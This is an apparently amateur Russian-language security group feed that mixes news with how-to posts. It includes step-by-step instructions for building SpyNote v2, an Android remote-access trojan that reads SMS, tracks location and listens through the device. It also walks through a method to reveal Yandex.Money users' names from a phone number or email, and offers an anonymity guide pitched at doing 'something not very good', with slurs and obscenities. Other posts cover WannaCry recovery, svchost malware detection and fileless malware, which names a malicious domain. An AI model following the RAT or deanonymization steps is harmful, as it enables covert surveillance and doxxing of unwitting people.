• Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Правила безопасности в Asterios Nertwork
    Этот пост я пишу для тех, кто хочет остаться анонимным!
    И так, начнем!
    Вы занимаетесь чем то не очень хорошим, или желаете скрыть свою личность?
    Тогда вам поможет эта статья, сегодня я @Vhack помогу вам остаться анонимным username
    Перед началом пару слов о том как можно вычислить человека))
    - Аватарка , многие ставят одни и те же авы что и в других соц сетях
    - Емайл , на сколько бы не была астериос анонимны / я использую мыло от временной почты / темп-мейл подойдет
    - Имя/ Логин - многие долбаебы ставят один и тот же логин и имя /ник
    - Граматическые ошибки , совершаю, специально, много: грам ошибок, меня сложнее
    вычеслить
    пппроехали теперь туториал Гайд от @vhack
    Регистрируемся на временную почту, если вашу основную почту взломают, они на изи смогут доказать что это вы , астероис хорошЪ тем / что он не обязывает подтверждать почту, поэтому я могу зарегаться на выдуманную почту и которая обезопасит меня от взлома/ главное помнить пароль от своего аккаунта
    А теперь самое интересное
    Зачем это все ???????
    ответ изи прост- пока ты анонимен/ ты можешь на изи постить / все что угодно
    И да / для тех кто пиздит про телеграмм/ идите нахуй/ просто идите нахуй/
    убейтесь по пути/ какого ебаного черта я должен указывать свой телефон в телеге?
    Дуров соси хуй!!! он сливает все о вас/ а если не он то / операторы связи на изи могут перехватить смс и войти ваш акаунта и прочитать всю переписку!
    Дуров просто пидорас , и обманщик, который пиздит про анонимность, в астериос установлен клод, который уже изначально не передает мой реальный ип, а если верить админам, то у них кроме Клода еще хуева куча прокси серверов/
    Мой ип уже в безопасности, а в телеге не ип ты скинь/ да и что
    мы можем наблюдать это в ролике стасяна , привет тебе от ильюхи


    минуты 5:24
    ня пока

  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    WannaCry - расшифровка файлов
    Вирус - вымогатель WannaCry атаковал 12 мая, в пятницу более 75000 компьютеров по всему миру. В основном пострадали крупные компании, организации, транспортные компании, медицинские и учебные учреждения, даже МВД РФ WannaCry не обошёл стороной. На данный момент пострадало уже более 300000 компьютеров более чем в 100 странах. WanaCrypt0r 2.0, или как его ещё называют "WannaCry", распространяется путём почтовых вложений. Оказавшись в системе вирус сканирует диски и сетевые папки на наличие файлов с определёнными расширениями (более 160) и шифрует их добавляя расширение .WNCRY. Затем подключаются функции червя - само распространение, WannaCry сканирует доступные ip адреса на 445 порт и распространяется по локальной сети. Удаляется данный шифратор как и прочие шифраторы - винлоки, входом в систему через "безопасный режим", очисткой автозагрузки и реестра, физическим удалением файлов вируса, удалением лишних записей из файла C:\Windows\System32\drivers\etc\hosts. НО, в случае если вы увидели на своём мониторе характерное окошко WannaCry, требующее вас отправить 300$ на биткоин кошелёк, ни в коем случае не торопитесь выключать или перезагружать компьютер, есть шанс расшифровать файлы!
    WannaCry - расшифровка файлов
    Wanakiwi - утилита в большинстве случаев поможет расшифровать зашифрованные вирусом WannaCry файлы, но только в том случае если после заражения компьютер не отключался и процесс, генерировавший ключ всё ещё запущен. Учитывая тот факт, что этот метод основан на сканировании адресного пространства процесса, который сгенерировал эти ключи, это означает, что если этот процесс был убит, например, путем перезагрузки - исходная память процесса будет потеряна. Очень важно, чтобы пользователи НЕ перезагрузили свою систему перед тем, как прибегнуть к помощи Wanakiwi.
    Скачать: wanakiwi.zip [363,95 Kb] (cкачиваний: 653)
    При запуске Wanakiwi автоматически ищет процессы, такие как:
    - wnry.exe
    - wcry.exe
    - data_1.exe
    - ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c...
    - tasksche.exe
    Но если в вашем случае название процесса отличается от стандартных то Wanakiwi можно запустить через консоль cmd с параметрами pid или process, чётко указав программе с каким процессом работать:
    wanakiwi.exe [/pid:PID|/process:program.exe]
    В процессе работы wanakiwi будет расшифровывать файлы создавая их как новые, не затрагивая шифрованные файлы с расширением .WNCRY.
    WannaCry - расшифровка файлов
    После того как файлы будут расшифрованы рекомендуется важные файлы скопировать на внешний носитель или облачное хранилище, затем выполнить перезагрузку системы в "безопасном режиме" и удалить файлы вируса и следы его присутствия. После чего выполнить обновление операционной системы. Microsoft выпустила обновления для всех уязвимых систем, в том числе и для уже не поддерживаемой windows XP.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    SpyNote v2 (RAT для Android'а)
    Возможности:
    Не требует Root прав
    Скачивание файлов с девайса
    Просмотр sms'ок
    Прослушка девайса
    Просмотр контактов
    Просмотр локации
    Терминал
    Билдер
    Инструкция к использованию:
    1. Запускаем SpyNote.exe
    2. Вписиваем порт. У меня 1604
    3. Тыкаем ОК
    4. После того как вылезло окошко тыкаем на Tools-->Build
    5. Вводим все что надо. Думаю здесь обяснять не надо
    5. Нажмаем на Build в левом верхнем углу (Build-->Build >)
    Видео:


    Cсылка будет в коментах

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Яндекс раскрывает персональные данные своих пользователей
    Яндекс вводит новую функцию в сервис Яндекс.Деньги. Нововведение нигде не афишируется, а пользователи натыкаются на него случайно.
    Что же сделал Яндекс?
    Теперь при переводе денег отображается поле «Получатель». ФИО берется из паспорта пользователя, указанного при идентификации кошелька. Без идентификации нельзя пользоваться сервисом Яндекс.Деньги, поэтому он будет указан у 95% владельцев кошельков.
    Яндекс раскрывает персональные данные своих пользователей
    А теперь почитаем FAQ сервиса. Нам говорится, что данные хранятся в секрете и никому не передаются. На деле любой пользователь может «раздеанонить» владельца кошелька всего лишь имея 0.01 рублей на балансе. Поэтому теперь владельцы небольших компаний, принимающих платежи на именной кошелек раскрывают свои данные.
    Яндекс раскрывает персональные данные своих пользователей
    А сейчас перейдем к практике.
    Нам понадобится примерно рубль на кошельке.
    Переходим на страницу «Перевод денег» — https://money.yandex.ru/transfer
    Далее будет поле «Кошелек, телефон или почта» — Да, можно узнать имя и отчество по телефону, почте и номеру кошелька!
    Яндекс раскрывает персональные данные своих пользователей
    Ставим сумму перевода 0.01 и нажимаем «Продолжить»
    Откроется нужное нам окно с раскрытием персональных данных.
    Яндекс раскрывает персональные данные своих пользователей, а также других сервисов. Если вы беспокоитесь о безопасности своих персональных данных, то Вам не к Яндексу.
    Прости, Илья Сегалович, мы все прое*али.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Лондонская галерея принимает криптовалюту
    Одна из самых посещаемых галерей Лондона – The House of Fine Art теперь предоставляет своим клиентам возможность приобрести произведения искусства за цифровую валюту
    Одна из самых посещаемых галерей Лондона, The House of Fine Art, расположенная в Мейфэре – центральном районе города, теперь предоставляет своим клиентам возможность приобрести произведения искусства за цифровую валюту.
    Таким образом, The House of Fine Art претендует на звание первой галереи, посетители которой смогут купить любую понравившуюся картину из коллекции, перечислив несколько токенов, а иногда и сотен токенов со своего криптовалютного кошелька.
    Соучредитель галереи Элио Д’Ана отметил, что клиенты уже не раз выявляли желание приобрести то или иное произведение искусства за биткоины, а потому нельзя было упускать такую возможность. Тем более, что с каждым днем криптовалюты становятся все более распространенным явлением во всех сферах жизни обычного потребителя.
    Руководство галереи убеждено, что уже в обозримом будущем произойдет усовершенствование системы купли-продажи работ, если большинство галерей последуют их примеру.
    Что касается стоимости объектов, то она самая разная – от 4 000 до 250 000 фунтов. Причем это могут быть не только картины, но и скульптуры за авторством итальянца Стефано Бомбардиери или французского скульптора Ричарда Орлински.
    Процесс продажи произведений стал доступен благодаря сотрудничеству с крипто-платформой Uphold. Вся коллекция галереи вскоре будет перемещена в другую локацию, где и произойдет продажа за криптовалюту в октябре этого года.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Исследование: популярность криптовалюты в Сети влияет на ее курс
    Аналитики Йельского университета провели исследование, в результате которого выявили прямую зависимость цены биткоина от внимания пользователей в сети Интернет.
    Аналитики Йельского университета провели исследование, в результате которого выявили прямую зависимость цены биткоина от внимания пользователей в сети Интернет.
    Так, в Национальном бюро экономических исследований США утверждают, что рост числа запросов в Google со словом «биткоин» сменяется ростом курса монеты (примерно на 3%) через несколько недель.
    Социальные сети также влияют на стоимость криптовалюты, например, за ростом количества сообщений в тематике биткоина в Twitter следует повышение в среднем на 2,5%.
    А вот новости о взломах и атаках на криптобиржи, наоборот, «тянут» криптовалюту «на дно».
    В результате исследований, ученые пришли к единогласному выводу: реакция цифровых валют на обстановку на рынках кардинально отличается от реакции фиатных средств на те же факторы, поэтому применять к криптовалютам традиционные методы анализа и расчета неприемлемо. Исследователи выявили факторы, которые действительно оказывают влияние на криптоиндустрию и курсы цифровых активов.
    «Эффект импульса». Если курс криптовалюты растет, то стоит ожидать дальнейшего восходящего тренда. Так, по мнению ученых, биткоин следует покупать, когда его цена вырастает не мнее, чем на 20% в сравнении с предшествующей неделей.
    Внимание со стороны инвесторов. Курс криптовалюты зависим от числа упоминаний о ней в Интернете. Когда внимание к определенной монете повышается, то и стоимость ее начинает пропорциональное движение вверх. Так, биткоин начинает расти в через 1-2 недели после повышения интереса к нему в Сети, эфириум – через неделю, а Ripple – через 1-6 недель.
    Кроме того, ученые пришли к выводу, что инвесторы должны уделить биткоину 6% от своего инвестиционного портфеля.

  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Booking.com передаёт приватные данные карт клиентов третьим лицам
    Пользователь Pikabu рассказал свою историю,где был замешан booking.com:
    «Все началось с моей поездки в Куала-Лумпур ( Малайзия ) 21го Июля 2018. Как обычно, по приезду, я начал искать место где можно остановиться. Для этого, я воспользовался небезызвестным сервисом Booking.com. Я довольно часто им пользуюсь, и обычно у меня не возникало никаких проблем. Стандартная процедура, выбрал отель, заполнил даты пребывания, подтвердил бронирование и отправился туда.
    Но как же Я был удивлен и возмущен, когда на респешене отеля, у администратора в руках, оказалась распечатанная бумажка с данными моей карты, включая : Тип карты, Имя и Фамилия на карте, Срок действия карты и CVV код! Данные все совпадают и их я вводил только на сайте Booking.com!
    Обратите внимание, под Reservation ID, мелким шрифтом написано: "You can view your guests credit card details 3 times" - " Вы можете просмотреть детали кредитной карты вашего гостя 3 раза ". Вероятно Booking.com дает возможность только три раза просмотреть эти данные, но как видите - этого хватило!
    Самое прикольное, что используя эти данные, администратор отеля списал деньги с карты для оплаты бронирования! Я даже не вводил пинкод!
    Получается букинг сливает секретные данные карт всем кому ни попадя и с помощью этих данных можно проводить операции без спроса владельца карты!
    Очень разочарован в Booking.com, карту был вынужден заблокировать.»

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    В Bluetooth обнаружена серьезная уязвимость, Apple уже выпустили заплатку
    23 июля 2018 года инженеры компании Intel сообщили об уязвимости Bluetooth, позволяющей хакерам перехватывать трафик, сообщения и другие данные с устройств Apple. Сотрудники корпорации уже исправили эту проблему.
    Ошибка шифрования касается подключения по Bluetooth и Bluetooth LE и затрагивает модули таких крупнейших поставщиков оборудования, как Apple, Broadcom, Intel, Qualcomm и, возможно, других игроков отрасли.
    Уязвимость возникает из-за того, что устройства недостаточно тщательно проверяют параметры шифрования и генерации открытых ключей доступа, происходящих в соотвествии с протоколом Диффи-Хеллмана, при защищенных Bluetooth-соединениях. Это позволяет злоумышленнику, находящемуся в радиусе 30 метров от спаренных гаджетов, получить несанкционированный доступ через соседнюю сеть, перехватывать трафик и отправлять фальшивые сообщения между уязвимыми устройствами. Что, в свою очередь, может привести к утечке конфиденциальных данных.
    Сотрудники Bluetooth Special Interest Group считают, что с подобной проблемой могло столкнуться весьма ограниченное число пользователей. Поскольку для успешной атаки хакеру необходимо находиться неподалеку от устройства жертвы, дождаться, когда оно образует Bluetooth-пару с другим гаджетом, а затем перехватить обмен ключами, заблокировать подтверждения и отправить вредноносный пакет данных в целевой девайс за короткий промежуток времени.
    Тем не менее, Apple уже выпустила исправления для всех своих устройств. Пользователям, своевременно устанавливающим обновления ПО, нечего опасаться.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Находим вирус,маскирующийся под svchost
    Как правило, большинство троянских и шпионских программ стараются скрыть своё присутствие на компьютере для чего прибегают к различного рода хитростям, например, тщательно прячут свои процессы либо маскируются под процессы системные. Потенциальной «жертвой» вируса может стать любой системный процесс, но чаще всего вредоносные программы прикрываются маской процесса svchost.
    И на это у них есть свои причины. Дело в том, что svchost запускается в нескольких экземплярах внешне практически ничем неотличимых друг от друга, так что если в Диспетчере задач появится ещё один процесс svchost, а их число может достигать нескольких десятков, особого подозрения со стороны пользователя это не вызовет. Но если они одинаковы, как определить, какой из них является настоящим, а какой волком в овечьей шкуре?
    Оказывается, что не так уже и сложно, но перед тем как приступать к их идентификации, позвольте пару слов о самом процессе svchost. Как видно из его полного названия Generic Host Process for Win32 Services, отвечает он за работу служб и сервисов, причём как системных, так и сторонних, использующих динамические библиотеки DLL, которые в свою очередь составляют немалую часть файлов Windows и прикладных программ.
    Этот процесс настолько важен, что если файл svchost.exe будет повреждён, Windows не сможет нормально работать. В работающей системе присутствует как минимум четыре экземпляра процесса svchost, но их может быть и значительно больше. Необходимость такого дублирования объясняется количеством обслуживаемых процессом служб и сервисов, а также необходимостью обеспечения стабильности системы.
    Итак, как же узнать, является ли svchost настоящим? Первым критерием подлинности файла svchost.exe является его месторасположение. Его законным местом обитания являются следующие папки:
    • C:/WINDOWS/system32
    • C:/Windows/SysWOW64
    • C:/WINDOWSPrefetch
    • C:WINDOWS/ServicePackFiles/i386
    • С:/WINDOWS/winsxs/*
    Примечание: звёздочка в конце пути С:/WINDOWS/winsxs обозначает, что в папке winsxs может быть ещё один каталог. Как правило, он имеет длинное название из набора символов, например, amd64_3ware.inf.resources_31bf3856ad364e35_6.3..... В виде исключения из правил файл svchost.exe может располагаться в каталоге антишпионской программы Malwarebytes Anti-Malware.
    Если же он обнаружится в какой-нибудь другой папке, особенно в корневой Windows или в «Пользователи», то скорее всего вы имеете дело с маскирующимся вирусом. Проверить расположение файла svchost.exe можно из Диспетчера задач, кликнув по процессу правой кнопкой мыши и выбрав в меню опцию «Открыть расположение файла» либо с помощью сторонних утилит вроде Process Explorer. Используя сторонние файловые менеджеры, также можно выполнить поиск всех файлов svchost.exe по маске.
    Последний способ не столь надёжен, так как подделывающийся под процесс svchost вирус может использовать более хитрый способ маскировки. Так, в имени файла одна из латинских букв может быть заменена кириллической. Внешне такой файл ничем не будет отличаться от настоящего, более того, он может располагаться в том же каталоге, что и «правильный» svchost.exe. Впрочем, проверить его подлинность не составляет особого труда. Достаточно сравнить коды символов имени файла воспользовавшись таблицей символов Юникода. Иногда в название файла svchost добавляется лишняя буква, либо наоборот, пропускается. Невнимательный пользователь может и не заметить разницу между, скажем, svchost.exe и svhost.exe.
    Тем не менее, спешить удалять подозрительный svchost сходу не стоит. Для начала неплохо было бы проверить его на мульти антивирусном сервисе вроде VirusTotal и, если подозрительный файл окажется подделкой, хотя одна из антивирусных программ выдаст положительный результат. Вредоносный файл, маскирующийся под svchost удаляем с помощью Dr.Web LiveDisk либо утилиты AVZ. Если будете использовать AVZ, вам также понадобиться специальный скрипт
    Алгоритм удаления вируса в AVZ следующий: запускаем утилиты, в меню Файл выбираем опцию «Выполнить скрипт» после чего вставляем код скрипта из прилагаемого файла и нажимаем кнопку «Запустить». При этом будет выполнена перезагрузка компьютера.
    После старта проверяем, был ли удалён вирус и проводим полную проверку системного раздела антивирусным сканером.
    Скрипт для AVZ:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
    QuarantineFile('полный путь к вредоносному файлу','');
    DeleteFile('полный путь к вредоносному файлу');
    BC_ImportAll;
    ExecuteSysClean;
    ExecuteWizard('TSW',2,3,true);
    BC_Activate;
    RebootWindows(true);
    end.
    В скобках напротив команд QuarantineFile и DeleteFile нужно указать полный путь к вредоносному файлу. Например: ('C:\Windows\system\syshost.exe','');

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Как злоумышленник взломает вашу почту?
    Рассмотрим наиболее распространенные приемы взлома электронной почты:
    Начнем с тяжелой артиллерии. Хакерские атаки на вашу электронную почту осуществляются компьютерными вирусами и троянскими программами. Для защиты используем антивирусы и (или) сетевые экраны. Конечно же,100% защиты использование антивируса не дает.
    2. Уязвимости почтовых серверов. Эта проблема из разряда высшей математики. Для ее решения целесообразно применять Почтовые клиенты.
    3. Применение программ-подборщиков паролей. Метод противодействия прост: выбираем надежные пароли! Не используем короткие пароли и мало букв, избегать ассоциаций (имена, клички, даты).
    4. Угадывание ответов на контрольные (секретные) вопросы. Девичья фамилия матери, имя домашнего питомца, номер паспорта или любимое блюдо – не такие уж и секретные сведения для злоумышленников.
    5. Социальная инженерия – использование методов психологии в решении криптографических задач. Вариантов множество: в соцсетях через список друзей узнать девичью фамилию матери или в фотографиях прочесть кличку собаки, отправить письмо от имени администрации сайта или техподдержки с просьбой выслать пароль, использовать фальшивую страничку почтового сервера для кражи ваших логина и пароля. В целях защиты будьте бдительны, внимательны и не доверяйте незнакомцам!

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Небольшой справочник по криптоалгоритмам
    Типизация КА
    Итак, представляю вам статью, в которой собраны, известные и не очень, криптографические алгоритмы. Оговоримся, что все статьи из данной серии не претендует на новаторство, или уникальность. Скорее краткий справочник, кто-то даже назовет это прикроватным чтивом. Существуют различные классификации криптоалгоритмов, например, такая:
    Для удобства я буду использовать деление на группы по количеству ключей:
    Бесключевые КА — не используют в вычислениях никаких ключей;
    Одноключевые КА — работают с одним ключевым параметром (секретным ключом);
    Двухключевые КА — на различных стадиях работы в них применяются два ключевых параметра: секретный и открытый ключи.
    Терминология:
    Открытый (исходный) текст — данные (не обязательно текстовые), передаваемые без использования криптографии.
    Шифротекст, шифрованный (закрытый) текст — данные, полученные после применения криптосистемы (обычно — с некоторым указанным ключом).
    Ключ — параметр шифра, определяющий выбор конкретного преобразования данного текста. В современных шифрах криптографическая стойкость шифра целиком определяется секретностью ключа (принцип Керкгоффса).
    Шифр, криптосистема — семейство обратимых преобразований открытого текста в шифрованный.
    Шифрование — процесс нормального применения криптографического преобразования открытого текста на основе алгоритма и ключа, в результате которого возникает шифрованный текст.
    Расшифровывание — процесс нормального применения криптографического преобразования шифрованного текста в открытый.
    Асимметричный шифр, двухключевой шифр, шифр с открытым ключом — шифр, в котором используются два ключа, шифрующий и расшифровывающий. При этом, зная лишь ключ зашифровывания, нельзя расшифровать сообщение, и наоборот.
    Открытый ключ — тот из двух ключей асимметричной системы, который свободно распространяется. Шифрующий для секретной переписки и расшифровывающий — для электронной подписи.Секретный ключ, закрытый ключ — тот из двух ключей асимметричной системы, который хранится в секрете.
    Криптоанализ — наука, изучающая математические методы нарушения конфиденциальности и целостности информации.
    Криптоаналитик — учёный, создающий и применяющий методы криптоанализа.
    Криптографическая атака — попытка криптоаналитика вызвать отклонения в атакуемой защищённой системе обмена информацией. Успешную криптографическую атаку называют взлом или вскрытие.
    Дешифрование (дешифровка) — процесс извлечения открытого текста без знания криптографического ключа на основе известного шифрованного. Термин дешифрование обычно применяют по отношению к процессу криптоанализа шифротекста (криптоанализ сам по себе, вообще говоря, может заключаться и в анализе криптосистемы, а не только зашифрованного ею открытого сообщения).
    Криптографическая стойкость — способность криптографического алгоритма противостоять криптоанализу.
    Имитозащита — защита от навязывания ложной информации. Другими словами, текст остаётся открытым, но появляется возможность проверить, что его не изменяли ни случайно, ни намеренно. Имитозащита достигается обычно за счет включения в пакет передаваемых данных имитовставки.
    Имитовставка — блок информации, применяемый для имитозащиты, зависящий от ключа и данных.
    Электронная цифровая подпись, или электронная подпись — асимметричная имитовставка (ключ защиты отличается от ключа проверки).Другими словами, такая имитовставка, которую проверяющий не может подделать.
    Центр сертификации — сторона, чья честность неоспорима, а открытый ключ широко известен. Электронная подпись центра сертификации подтверждает подлинность открытого ключа.
    Хеш-функция — функция, которая преобразует сообщение произвольной длины в число («свёртку») фиксированной длины. Для криптографической хеш-функции (в отличие от хеш-функции общего назначения) сложно вычислить обратную и даже найти два сообщения с общей хеш-функцией.
    Бесключевые КА
    md2/4/5/6
    MD2 — криптографическая хеш-функция, разработанная Рональдом Ривестом в 1989 году, и описанная в RFC 1319. На входе сообщение произвольный длины. Размер хеша — 128 бит.
    Tiger
    Криптографическая хеш-функция, разработанная Росом Андерсоном и Эли Бихамом в 1995 году. Tiger был предназначен для особенно быстрого выполнения на 64-разрядных компьютерах. Tiger не имеет патентных ограничений, может использоваться свободно как с эталонной реализацией, так и с её модификациями. Размер значения хеша — 192 бита (Tiger/192), хотя имеются также более короткие версии для совместимости с SHA-1 (Tiger/160) и с MD4, MD5, RIPEMD, Snefru (Tiger/128). Скорость работы — 132 Мбит/с (проверено на одном процессоре Alpha 7000, модель 660). На современных процессорах значительно быстрее (даже при тесте на 32-битном AMD Sempron 3000+ скорость около 225 Мбит/с).
    Так же была реализована Вторая версия Tiger2 —отличается от основной только другим алгоритмом добавления битов, сходным с MD5/SHA-1. Для Tiger2 доступны тестовые векторы.
    Sha-1/2
    Алгоритм криптографического хеширования. Описан в RFC 3174. Для входного сообщения произвольной длины (максимум 22^64-1 бит, что примерно равно 2 эксабайта) алгоритм генерирует 160-битное хеш-значение, называемое также дайджестом сообщения. Используется во многих криптографических приложениях и протоколах. Также рекомендован в качестве основного для государственных учреждений в США. Принципы, положенные в основу SHA-1, аналогичны тем, которые использовались Рональдом Ривестом при проектировании MD4.
    SHA-3
    Алгоритм хеширования переменной разрядности, разработанный группой авторов во главе с Йоаном Дайменом, соавтором Rijndael, автором шифров MMB, SHARK, Noekeon, SQUARE и BaseKing. 2 октября 2012 года Keccak стал победителем конкурса криптографических алгоритмов, проводимым Национальным институтом стандартов и технологий США. 5 августа 2015 года алгоритм утверждён и опубликован в качестве стандарта FIPS 202. В программной реализации авторы заявляют о 12,5 циклах на байт при выполнении на ПК с процессором Intel Core 2. Однако в аппаратных реализациях Keccak оказался намного быстрее, чем все другие финалисты. Алгоритм SHA-3 построен по принципу криптографической губки.
    Ripemd
    Криптографическая хеш-функция, разработанная в Католическом университете Лувена Хансом Доббертином (Hans Dobbertin), Антоном Босселарсом (Antoon Bosselaers) и Бартом Пренелом (Бартом Пренелем). Для произвольного входного сообщения функция генерирует 160-разрядное хеш-значение, называемое дайджестом сообщения. RIPEMD-160 является улучшенной версией RIPEMD, которая, в свою очередь, использовала принципы MD4 и по производительности сравнима с более популярной SHA-1.
    Существуют так же 128-, 256- 320-битные версии алгоритма, имеющие соответственные названия.
    Haval
    Криптографическая хеш-функция, разработанная Yuliang Zheng (англ.), Josef Pieprzyk (англ.) и Jennifer Seberry (англ.) в 1992 году. Для произвольного входного сообщения функция генерирует хеш-значение, называемое дайджестом сообщения, которое может иметь длину 128, 160, 192, 224 или 256 бит. Количество итераций — переменное, от 3 до 5. Количество раундов на каждой итерации — 32. Является модификацией MD5.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Блэд Вступи !

  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Новый вариант атаки Spectre для удаленного извлечения данных по сети
    Специалисты в области безопасности разработали метод эксплуатации уязвимостей класса Spectre, присутствующих во всех современных процессорах, через подключение по сети. Все ранее описанные атаки Spectre предполагали локальное выполнение произвольного кода для извлечения из памяти или приложений важной информации, такой как пароли, ключи шифрования и прочие конфиденциальные данные. Однако команда исследователей из Грацкого технического университета (Австрия) разработала новый вариант атаки Spectre, позволяющий удаленно извлечь данные по сети без необходимости выполнения произвольного кода.
    Метод, получивший название NetSpectre, был успешно протестирован в рамках локальной сети и на виртуальных машинах в Google Cloud. Хотя в теории атаки NetSpectre могут представлять существенную угрозу, в действительности извлечение данных происходит довольно медленно. В частности, в ходе кеш-атак по сторонним каналам скорость составляла всего 15 бит/ч, а при использовании нового скрытого канала, основанного на времени исполнения инструкций AVX2, - 60 бит/ч. В экспериментах в Google Cloud ученым удалось извлечь данные с виртуальной машины со скоростью 3 бита/ч.
    Новая техника может использоваться не только для удаленного извлечения данных, но и для обхода технологии ASLR (Address Space Layout Randomization, случайное распределение адресного пространства), отметили исследователи.
    По их словам, для предотвращения атак NetSpectre достаточно уже существующих мер защиты, рекомендуемых для оригинальной уязвимости Spectre. К тому же, поскольку NetSpectre – сетевая атака, средствам защиты от DDoS-атак не составит труда ее обнаружить.
    Днями ранее исследователи из Калифорнийского университета опубликовали подробности о новом методе SpectreRSB, эксплуатирующем компонент Return Stack Buffer, вовлеченный в процедуру спекулятивного выполнения. Одна из его основных особенностей заключается в возможности обхода патчей против атак класса Spectre. Хотя на сегодняшний день нет информации о реальных атаках с использованием уязвимостей Spectre/Meltdown, эксперты в области безопасности усиленно работают над методами защиты от подобных атак.
    Google Cloud – платформа, позволяющая клиентам создавать, тестировать и развертывать собственные приложения в виртуальных машинах на инфраструктуре Google.
    Address space layout randomization (ASLR) — применяемая в операционных системах технология, при использовании которой случайным образом изменяется расположение в адресном пространстве процесса важных структур, а именно: образа исполняемого файла, подгружаемых библиотек, кучи и стека.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Вирусы,которые располагаются в ОЗУ
    Обычные вирусы оставляют следы на зараженной машине — какие-нибудь подозрительные исполняемые файлы, файлы библиотек или просто огрызки зловредного кода, которые в состоянии обнаружить антивирус или же правильный админ. Нахождение и выявление таких следов помогают идентифицировать вирус, а значит – удалить его и минимизировать последствия.
    Но противостояние меча и щита — штука вечная, и компьютерные зловреды не ограничиваются только теми, что оставляют какие-то следы на накопителях. Ведь если вирус размещается и действует только внутри оперативной памяти, не соприкасаясь с жестким диском или SSD, значит, следов на них он тоже не оставит.
    Данные транзакций считаются защищенными, так как хранятся в зашифрованном виде на серверах платежных систем. Но существует очень короткий период времени, в течение которого информация для авторизации платежа хранится в виде plain text. Причем хранится именно в оперативной памяти платежного терминала.
    Само собой, хакерам этот кусок показался слишком лакомым, чтобы просто так пройти мимо него, и на свет появились зловреды, собирающие информацию из RAM POS-терминалов — номера карт, адреса, коды безопасности и имена пользователей.
    А затем кто-то решил пойти дальше, вспомнив, что у компьютеров тоже есть оперативная память.
    RAM-only
    Февраль 2017 года, компания «Лаборатория Касперского» выпускает материал о том, что подобный зловред поразил компьютеры в телекоммуникационных компаниях, банках и правительственных учреждениях в 40 странах.
    Как проходит заражение машины в таком случае:
    зловред прописывает себя непосредственно в оперативную память, минуя жесткие диски
    из-за этого при проверке безопасности его не получается обнаружить
    для прописывания зловреда в память злоумышленники использовали популярные средства администрирования — PowerShell, Mimikatz, Metasploit
    для передачи данных использовались сайты, созданные на национальных доменах таких стран как Габон, Центральноафриканская Республика и Мали. Их домены характерны тем, что они не сохраняют WHOIS-информацию о том, кому принадлежал конкретный домен, после истечения срока его продления. То есть еще минус одна возможность как-то отследить злоумышленника.
    Киберпреступники успевали собрать данные о логинах и паролях системных администраторов, что позволяло в будущем администрировать зараженный хост. И понятно, что при такой возможности управления зараженным компьютером, можно наделать много не самых законных действий, но главное направление таких атак — это «дойка» банкоматов.
    Найти такие вирусы трудно, потому что в привычном виде они на самом деле не оставляют следов. Нет каких-то установленных приложений. Нет отдельных файлов, раскиданных в разных папках, включая системные или скрытые.
    Но где-то же они оставляют следы?
    Само собой, если вирус не оставляет следов на накопителях, на них нет и особого смысла искать. И что тогда? Правильно — реестр, дампы памяти и сетевая активность. Надо же ему как-то прописать себя в память (причем так, чтобы сохранять работоспособность и после перезагрузки машины), а затем как-то передавать данные на сервер злоумышленника.
    Специалисты “Лаборатории Касперского” тщательно проанализировали дампы памяти и записи реестра с машин, подвергшихся заражению, и с помощью Mimikatz и Meterpreter смогли реконструировать атаку.
    Фрагмент кода, загруженного с помощью Meterpreter с сайта adobeupdates.sytes[.]net
    Скрипт, сгенерированный фреймворком Metasploit.
    Выделяет необходимое количество памяти, использует WinAPI и загружает утилиту Meterpreter прямо в оперативную память.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    Проверям состояние портов и не только
    Чтобы проверить состояние портов, необходимо открыть командную строку. Для этого используйте шорткат Win+R, в появившемся окошке наберите cmd и нажмите Ввод
    В окне командной строки наберите команду netstat -a (перед знаком минус не забудьте поставить пробел), нажмите Ввод. После быстрого сканирования Вы сможете посмотреть какие сокеты открыты на Вашем ПК и в каком состоянии они находятся:
    Как видим, для каждого активного сокета указывается протокол, локальный и внешний адрес, а также состояние протокола. Вот список и значение самых распространенных состояний:
    LISTENING – значит, что порт ожидает входящих соединений
    ESTABLISHED – соединение установлено
    CLOSE_WAIT – ожидание закрытия вследствие отключения удаленной стороны
    TIME_WAIT – порт закрыт, но еще ожидает входящие пакеты для обработки
    SYN_SENT – установка соединения
    Интерес представляет конечно же не только получить список сокетов, но и узнать какая программа какой номер порта использует. Для этого в командном окне наберите команду netstat -n -b (пробелы перед знаком минус):
    Возле номера каждого сокета в квадратных скобках указана программа, которая его использует (исполняемое имя файла).
    Если Вы обнаружили, что какой-то порт использует программа, которую Вы не запускали и которая похожа на троян или вирус, то его следует закрыть.
    Закрыть порт можно при помощи фаервола. Однако гораздо быстрей и эффективней будет использовать небольшую бесплатную программу под названием Windows Worms Doors Cleaner (WWDC)
    После запуска она покажет список открытых сокетов, которые представляют опасность, и которые специалисты в области информационной защиты настоятельно рекомендуют держать отключенными: 135, 445, 137-139. Чтобы сделать их неактивными, просто нажмите кнопки справа от каждого красного значка:
    После вступлений изменений в силу Вы получите такую картину:
    Преимущество программы WWDC перед фаерволами состоит в том, что она не просто блокирует открытые порты, но закрывает их, отключая службы, которые их используют. Это, как Вы понимаете, гораздо эффективнее, потому что устраняет источник проблемы, а не симптомы.

    post-img
  • Компхутерная БЕЗАПАСНАТЪ ! 5months ago

    WiGLE: Wifi позволяет узнать о вас всё
    Речь, конечно, не идет о ваших разговорах, а вот о месте жительства, работы и путешествиях узнать вполне можно, поскольку мобильные устройства способны сообщать о своих предыдущих соединениях.
    Как это происходит?
